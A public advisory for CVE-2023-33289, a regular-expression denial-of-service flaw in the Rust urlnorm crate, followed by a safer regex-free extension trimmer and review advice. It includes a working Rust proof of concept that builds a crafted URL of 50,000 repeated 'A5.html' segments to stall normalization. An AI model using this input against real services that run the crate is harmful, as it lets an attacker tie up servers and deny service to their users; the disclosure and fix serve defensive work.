Headline
CVE-2023-33289: Public disclosure of vulnerability inside the urlnorm crate through 0.1.4 for Rust
The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.
Regex Denial of service in urlnorm package on https://crates.io/crates/urlnorm
The regex defined on line 37 of https://github.com/progscrape/urlnorm/blob/main/src/lib.rs, used to trim .html and other
extensions when normalizing a URL, is vulnerable to a Regular Expression Denial of Service when malicious input is provided: a crafted path makes the match take time that grows far faster than the input length, so a single request can tie up the normalizing thread.
PoC Code:
```rust
use std::time::Instant;
use url::Url;
use urlnorm::UrlNormalizer;

fn main() {
    println!("[ + ] Testing urlnorm package");
    // Build a long run of "A5.html" repeats to feed the extension-trimming regex.
    let x = "A5.html".repeat(50000);
    let norm = UrlNormalizer::default();
    let mut url_input = "https://goooooooogle.com/hello/index.html/".to_owned();
    url_input.push_str(&x);
    // Append a NUL byte; the url crate percent-encodes it as %00 in the path.
    url_input.push_str("\x00");
    let url = Url::parse(&url_input).unwrap();
    println!("{:?}", url);
    let start = Instant::now();
    // Normalization runs the vulnerable regex over the crafted path.
    let normalized = norm.compute_normalization_string(&url);
    //let normalized = norm.normalize_host(&url).unwrap();
    println!("[ + ] Url -> {:?}", normalized);
    let end = start.elapsed();
    println!("[ + ] Time elapsed {:?}", end);
}
```
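The advisory does not reproduce the regex itself, so the example below (added here; it is not code from urlnorm or its fix) shows the shape of a trimmer that cannot be made slow by input shape: it strips trailing slashes and a chain of known extensions with plain suffix checks, so every pass either returns or shortens the path by at least one byte and the total cost is bounded by path length times the number of extensions. The extension list and the function names are assumptions of the example. It also builds a path like the PoC's (50,000 repeats of "A5.html") and times the trimmer on it, which stays in the microsecond range because there is nothing to backtrack over.

```rust
use std::time::{Duration, Instant};

/// Extensions trimmed from the end of a path. Illustrative list only;
/// it is an assumption of this example, not the list used by urlnorm.
const STRIPPABLE_EXTENSIONS: &[&str] = &[".html", ".htm", ".php", ".asp", ".aspx"];

/// ASCII-case-insensitive `strip_suffix`: returns `s` without `suffix`
/// when `s` ends with it in any ASCII case, otherwise `None`.
fn strip_suffix_ignore_ascii_case<'a>(s: &'a str, suffix: &str) -> Option<&'a str> {
    let cut = s.len().checked_sub(suffix.len())?;
    if !s.is_char_boundary(cut) {
        return None;
    }
    let (head, tail) = s.split_at(cut);
    if tail.eq_ignore_ascii_case(suffix) {
        Some(head)
    } else {
        None
    }
}

/// Strip trailing slashes and any chain of known extensions from the end
/// of `path` (e.g. "/a/b.php.html/" -> "/a/b"). Each loop pass either
/// returns or removes at least one byte, so the work is bounded by
/// `path.len() * STRIPPABLE_EXTENSIONS.len()` for any input: no regex,
/// no backtracking, nothing for a crafted path to amplify.
pub fn trim_extensions(path: &str) -> &str {
    let mut rest = path.trim_end_matches('/');
    loop {
        let mut shortened = None;
        for ext in STRIPPABLE_EXTENSIONS {
            if let Some(head) = strip_suffix_ignore_ascii_case(rest, ext) {
                shortened = Some(head.trim_end_matches('/'));
                break;
            }
        }
        match shortened {
            Some(head) => rest = head,
            None => return rest,
        }
    }
}

/// Build a path shaped like the PoC's (constructed input: "/hello/index.html/"
/// followed by `repeats` copies of "A5.html") and time the trimmer on it.
/// Returns the trimmed path and the elapsed time.
pub fn trim_poc_like_path(repeats: usize) -> (String, Duration) {
    let mut path = String::from("/hello/index.html/");
    path.push_str(&"A5.html".repeat(repeats));
    let start = Instant::now();
    let out = trim_extensions(&path).to_owned();
    (out, start.elapsed())
}

fn main() {
    let (out, took) = trim_poc_like_path(50_000);
    println!("trimmed to {} bytes in {:?}", out.len(), took);
}
```

The same bound is what to look for when reviewing any regex that runs on attacker-controlled URL components: if the worst-case cost cannot be stated from the pattern alone, replace the pattern with explicit suffix or prefix checks, or cap the length of the component before matching.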